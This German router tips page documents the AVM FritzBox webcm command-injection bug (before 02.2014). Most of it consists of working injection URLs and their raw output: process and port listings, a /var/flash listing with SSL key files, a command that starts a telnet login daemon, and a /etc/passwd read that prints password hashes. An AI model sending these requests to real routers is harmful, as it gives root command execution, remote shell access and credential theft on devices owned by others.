19.04.2023

sonstige Hardware Tipps und FAQs

LANCOM
MicroTik
Securepoint
Watchguard
ubiquiti
Funkwerk
Cisco
AVM
NetGear
LevelOne
Siemens
Telekom Speedport/Digibox
ZyXEL
PC Engines
sonstiges

Fritz!Box Bug Test

Fritz!Box Wiki
Fritz!Box BusyBox-Befehle

sonstiges

Seitenanfang

AVM FritzBox Bug (bis 02.2014)

Ausgabe BusyBox Parameter

http://192.168.178.1/cgi-bin/webcm?var%3Alang=%3Becho+-e+%22Content-Type%3A+text/plain\r\n\r\n%22 %3B uptime %3B busybox %3B

17:04:39 up  2:19,  load average: 1.03, 1.03, 1.00
BusyBox v1.19.3 (2012-08-07 18:33:02 CEST) multi-call binary.
Copyright (C) 1998-2011 Erik Andersen, Rob Landley, Denys Vlasenko
and others. Licensed under GPLv2.
See source distribution for full notice.

Usage: busybox [function] [arguments]...
   or: busybox --list[-full]
   or: function [arguments]...

	BusyBox is a multi-call binary that combines many common Unix
	utilities into a single executable.  Most people will create a
	link to busybox for each function they wish to use and BusyBox
	will act like whatever it was invoked as.

Currently defined functions:
	[, [[, arp, arping, ash, basename, brctl, bunzip2, bzcat, bzip2, cat,
	chgrp, chmod, chown, chroot, cmp, cp, cut, date, dd, df, dirname,
	dmesg, dnsdomainname, du, echo, egrep, env, ether-wake, expr, false,
	fgconsole, fgrep, find, flock, free, ftpget, ftpput, getopt, grep,
	groups, gunzip, gzip, halt, hostname, id, ifconfig, ifdown, ifup,
	inetd, init, insmod, iostat, ip, ipaddr, iplink, iproute, iprule,
	iptunnel, kill, killall, killall5, ln, login, logname, ls, lsmod,
	md5sum, mkdir, mkfifo, mknod, mkswap, modprobe, more, mount, mpstat,
	mv, nbd-client, nc, netstat, nice, nohup, nslookup, passwd, pidof,
	ping, ping6, pivot_root, pmap, poweroff, printenv, printf, ps, pstree,
	pwd, pwdx, readlink, realpath, reboot, renice, reset, rm, rmdir, rmmod,
	route, sed, seq, setconsole, setserial, sh, sleep, smemcap, sort, stat,
	stty, swapoff, swapon, switch_root, sync, sysctl, tail, tar, tee,
	telnetd, test, tftp, time, top, touch, tr, traceroute, true, tty,
	ubimkvol, ubirmvol, ubirsvol, ubiupdatevol, umount, uname, uniq, unxz,
	unzip, uptime, vi, wc, wget, whois, xargs, xz, xzcat, zcat

http://192.168.178.1/cgi-bin/webcm?var%3Alang=%3Becho+-e+%22Content-Type%3A+text/plain\r\n\r\n%22 %3B ps w %3B

PID USER       VSZ STAT COMMAND
    1 root      1236 S    init
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [migration/0]
    4 root         0 SW   [ksoftirqd/0]
    5 root         0 SW   [watchdog/0]
    6 root         0 SW   [migration/1]
    7 root         0 SW   [ksoftirqd/1]
    8 root         0 SW   [watchdog/1]
    9 root         0 SW   [yield_w/0]
   10 root         0 SW   [yield_w/1]
   11 root         0 SW   [events/0]
   12 root         0 SW   [events/1]
   13 root         0 SW   [khelper]
   16 root         0 SW   [async/mgr]
   32 root         0 SW   [sync_supers]
   33 root         0 SW   [bdi-default]
   35 root         0 SW   [kblockd/0]
   36 root         0 SW   [kblockd/1]
   56 root         0 SW   [kswapd0]
   57 root         0 SWN  [ksmd]
   58 root         0 SW   [aio/0]
   59 root         0 SW   [aio/1]
   73 root         0 SW   [pm_info]
   80 root         0 SWN  [avmdebug]
  106 root         0 SW   [mtdblockd]
  115 root         0 DW   [ifx_ssc]
  127 root         0 SW   [l2tp]
  131 root         0 SW   [tffsd_mtd_0]
  132 root         0 SW   [avmnet_workqueu]
  137 root         0 SW   [avmnet_timer]
  139 root         0 SW<  [loop0]
  175 root         0 SW   [yaffs-bg-1]
  391 root         0 SW   [cleanup_timer_f]
  501 root         0 SW   [yaffs-bg-1]
  520 root         0 SW   [capi_pipew/0]
  521 root         0 SW   [capi_pipew/1]
  522 root         0 SW   [capi_schedw/0]
  523 root         0 SW   [capi_schedw/1]
  524 root         0 SW   [pcmlink_ctrl]
  527 root         0 SW   [capitransp]
  611 root      1292 S <  /sbin/udevd --daemon
  631 root         0 SW   [khubd]
  879 root      1264 S <  /sbin/udevd --daemon
  880 root      1268 S <  /sbin/udevd --daemon
  918 root      2456 S    /bin/configd
 1022 root      2588 S    dsl_monitor -d
 1023 root      2588 S    dsl_monitor -d
 1024 root      2588 S    dsl_monitor -d
 1026 root      2588 S    dsl_monitor -d
 1167 root      2692 S    avmipcd
 1170 root      3208 S    l2tpv3d
 1181 root      7140 S    upnpd
 1201 root      2892 S    upnpdevd
 1204 root      2892 S    upnpdevd
 1213 root      2592 S    wland -B
 1224 root      4300 S    pbd
 1226 root      4300 S    pbd
 1228 root      4300 S    pbd
 1230 root      4300 S    pbd
 1240 root      5604 S    telefon a127.0.0.1
 1263 root      1236 S    /usr/sbin/inetd
 1271 root      1136 S    /bin/run_clock -c /dev/tffs -d
 1281 root      1236 S    init
 1283 root      5604 S    telefon a127.0.0.1
 1284 root      5604 S    telefon a127.0.0.1
 1945 root      7140 S    upnpd
 1946 root      7140 S    upnpd
 1947 root      7140 S    upnpd
 1951 root      1412 S    hostapd -B /etc/wpa2/WSC_ath0.conf
 1976 root      3416 S    usermand
 1978 root      3268 S    contfiltd
 2586 root     12964 S    ctlmgr
 2587 root     12964 S    ctlmgr
 2588 root     12964 S    ctlmgr
 2589 root     12964 S    ctlmgr
 2687 root      4236 S    dsl_control -i10_00_10_40_00_04_01_07 -f/lib/modules/dsp_vr9/vr9-B-dsl.bin -n/etc/dsl/notify/dsl_notify.s
 2701 root      4236 S    dsl_control -i10_00_10_40_00_04_01_07 -f/lib/modules/dsp_vr9/vr9-B-dsl.bin -n/etc/dsl/notify/dsl_notify.s
 2702 root      4236 S    dsl_control -i10_00_10_40_00_04_01_07 -f/lib/modules/dsp_vr9/vr9-B-dsl.bin -n/etc/dsl/notify/dsl_notify.s
 2703 root      4236 S    dsl_control -i10_00_10_40_00_04_01_07 -f/lib/modules/dsp_vr9/vr9-B-dsl.bin -n/etc/dsl/notify/dsl_notify.s
 2704 root      4236 S    dsl_control -i10_00_10_40_00_04_01_07 -f/lib/modules/dsp_vr9/vr9-B-dsl.bin -n/etc/dsl/notify/dsl_notify.s
 2705 root      4236 S    dsl_control -i10_00_10_40_00_04_01_07 -f/lib/modules/dsp_vr9/vr9-B-dsl.bin -n/etc/dsl/notify/dsl_notify.s
 2709 root         0 SW   [autbtex]
 2710 root         0 SW   [pmex_ne]
 2711 root         0 SW   [pmex_fe]
 2950 root      3892 S    multid
 2984 root      5688 S <  voipd
 3138 root      2660 S    /sbin/nmbd
 3595 root      4276 S    dsld -i -n
 3891 root      2944 S    /cgi-bin/webcm

http://192.168.178.1/cgi-bin/webcm?var%3Alang=%3Becho+-e+%22Content-Type%3A+text/plain\r\n\r\n%22 %3B cd /var/flash %3B ls -al %3B

drwxr-xr-x    1 root     root          2048 Apr 19 16:38 .
drwxr-x---   14 root     root          1180 Apr 19 15:45 ..
-rw-r--r--    2 root     root         56378 Apr 19 16:39 ar7.cfg
-rw-r--r--    2 root     root             0 Jan  1  1970 aura-usb
-rw-r--r--    2 root     root             0 Jan  1  1970 browser-data
-rw-r--r--    2 root     root             0 Jan  1  1970 calllog
-rw-r--r--    2 root     root             0 Jan  1  1970 cert.cfg
-rw-r--r--    2 root     root           312 Jan  1  1970 configd
crw-r--r--    1 root     root      243,  95 Jan  1  1970 crash.log
drwxr-xr-x    1 root     root          2048 Jan  1  1970 data
crw-r--r--    1 root     root      243,  98 Jan  1  1970 debug.cfg
-rw-r--r--    2 root     root             0 Jan  1  1970 featovl.cfg
-rw-r--r--    2 root     root             0 Jan  1  1970 fonctrl
-rw-r--r--    2 root     root             0 Jan  1  1970 fx_cg
-rw-r--r--    2 root     root         26348 Apr 19 15:34 fx_conf
crw-r--r--    1 root     root      243,  99 Jan  1  1970 fx_def
-rw-r--r--    2 root     root          5892 Jan  1  1970 fx_lcr
-rw-r--r--    2 root     root             0 Jan  1  1970 fx_moh
drwx------    1 root     root          2048 Jan  1  1970 lost+found
-rw-r--r--    2 root     root             0 Jan  1  1970 maild.xml
-rw-r--r--    2 root     root             0 Jan  1  1970 modulemem
-rw-r--r--    2 root     root             0 Apr 19 16:37 multid.leases
-rw-r--r--    2 root     root             0 Jan  1  1970 net.update
crw-------    1 root     root      243,  96 Apr 19 15:32 panic
-rw-r--r--    2 root     root          1442 Jan  1  1970 phonebook
drwxr-xr-x    1 root     root          2048 Jan  1  1970 provider_default
-rw-r--r--    2 root     root          1938 Apr 19 15:33 stat.cfg
-rw-r--r--    2 root     root          8392 Jan  1  1970 tamconf
-rw-r--r--    2 root     root          4286 Jan  1  1970 telefon_misc
-rw-r--r--    2 root     root             0 Jan  1  1970 timeprofile.cfg
-rw-r--r--    2 root     root          1663 Apr 19 15:34 tr069.cfg
-rw-r--r--    2 root     root             0 Jan  1  1970 umts.cfg
-rw-r--r--    2 root     root          2143 Apr 19 15:45 usb.cfg
-rw-r--r--    2 root     root          1147 Jan  1  1970 usbgsm.cfg
-rw-r--r--    2 root     root          3873 Jan  1  1970 user.cfg
-rw-r--r--    2 root     root          1864 Apr 19 16:31 userstat.cfg
-rw-r--r--    2 root     root          7016 Apr 19 15:31 voip.cfg
-rw-r--r--    2 root     root             0 Jan  1  1970 voipd_call_stat
-rw-r--r--    2 root     root             0 Jan  1  1970 vpn.cfg
-rw-r--r--    2 root     root          1285 Jan  1  1970 websrv_ssl_cert.pem
-rw-r--r--    2 root     root          1766 Jan  1  1970 websrv_ssl_key.pem
-rw-r--r--    2 root     root          3827 Jan  1  1970 wlan.cfg
-rw-r--r--    2 root     root             0 Jan  1  1970 xdslmode

http://192.168.178.1/cgi-bin/webcm?var%3Alang=%3Becho+-e+%22Content-Type%3A+text/plain\r\n\r\n%22 %3B netstat -tulpn %3B

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      2687/dsl_control
tcp        0      0 127.0.0.1:1011          0.0.0.0:*               LISTEN      1240/telefon
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN      1240/telefon
tcp        0      0 :::49443                :::*                    LISTEN      1181/upnpd
tcp        0      0 :::5060                 :::*                    LISTEN      2984/voipd
tcp        0      0 :::53157                :::*                    LISTEN      2586/ctlmgr
tcp        0      0 :::49000                :::*                    LISTEN      1181/upnpd
tcp        0      0 :::139                  :::*                    LISTEN      1263/inetd
tcp        0      0 :::80                   :::*                    LISTEN      2586/ctlmgr
tcp        0      0 :::49200                :::*                    LISTEN      1181/upnpd
tcp        0      0 :::53                   :::*                    LISTEN      2950/multid
tcp        0      0 :::8181                 :::*                    LISTEN      1978/contfiltd
tcp        0      0 :::21                   :::*                    LISTEN      1263/inetd
tcp        0      0 :::8182                 :::*                    LISTEN      2586/ctlmgr
tcp        0      0 :::445                  :::*                    LISTEN      1263/inetd
udp        0      0 192.168.178.1:137       0.0.0.0:*                           3138/nmbd
udp        0      0 169.254.1.1:137         0.0.0.0:*                           3138/nmbd
udp        0      0 0.0.0.0:137             0.0.0.0:*                           3138/nmbd
udp        0      0 192.168.178.1:138       0.0.0.0:*                           3138/nmbd
udp        0      0 169.254.1.1:138         0.0.0.0:*                           3138/nmbd
udp        0      0 0.0.0.0:138             0.0.0.0:*                           3138/nmbd
udp        0      0 0.0.0.0:67              0.0.0.0:*                           2950/multid
udp        0      0 192.168.178.1:1900      0.0.0.0:*                           2586/ctlmgr
udp        0      0 192.168.178.1:1900      0.0.0.0:*                           1181/upnpd
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           2586/ctlmgr
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           1181/upnpd
udp        0      0 192.168.178.1:33145     0.0.0.0:*                           2586/ctlmgr
udp        0      0 :::7077                 :::*                                2984/voipd
udp        0      0 :::47154                :::*                                2950/multid
udp        0      0 :::53                   :::*                                2950/multid
udp        0      0 :::53943                :::*                                1181/upnpd
udp        0      0 :::5060                 :::*                                2984/voipd
udp        0      0 :::39760                :::*                                2950/multid
udp        0      0 :::46303                :::*                                1978/contfiltd
udp        0      0 :::38754                :::*                                2586/ctlmgr
udp        0      0 :::5353                 :::*                                2950/multid
udp        0      0 :::5353                 :::*                                2950/multid
udp        0      0 :::5355                 :::*                                2950/multid
udp        0      0 :::5355                 :::*                                2950/multid
udp        0      0 fe80::a96:d7ff:fe73:2581:1900 :::*                                1181/upnpd
udp        0      0 fe80::a96:d7ff:fe73:2581:1900 :::*                                2586/ctlmgr
udp        0      0 :::1900                 :::*                                2586/ctlmgr
udp        0      0 :::1900                 :::*                                1181/upnpd
udp        0      0 fe80::a96:d7ff:fe73:2581:46333 :::*                         2586/ctlmgr

- Telnet Sitzung starten, Kennwort der Fritzbox (Webinterface) eingeben.

http://192.168.178.1/cgi-bin/webcm?var%3Alang=%3Becho+-e+%22Content-Type%3A+text/plain\r\n\r\n%22 %3B /usr/sbin/telnetd -l /sbin/ar7login %3B

- User anzeigen

http://192.168.178.1/cgi-bin/webcm?var%3Alang=%3Becho+-e+%22Content-Type%3A+text/plain\r\n\r\n%22%20%3B%20cat%20/etc/passwd%20%3B

root:x:0:0:root:/:/bin/sh
boxusr10:$1$asqrnjv$bHLBUP/x6rXTQLvWAcBqi0:1010:0:box user:/home-not-used:/bin/sh
boxusr10int:$1$gcqcmaz$OwCy3me5.tZ4g/outs5GR/:2010:0:box user:/home-not-used:/bin/sh
boxusr100:$1$ngunhlt$6mnyZWLkOqHeyaT9hUNKN1:1100:0:box user:/home-not-used:/bin/sh
boxusr100int:$1$tklxkan$P1YG1URvVDAsQNE39179Z/:2100:0:box user:/home-not-used:/bin/sh

 

Seitenanfang

sonstiges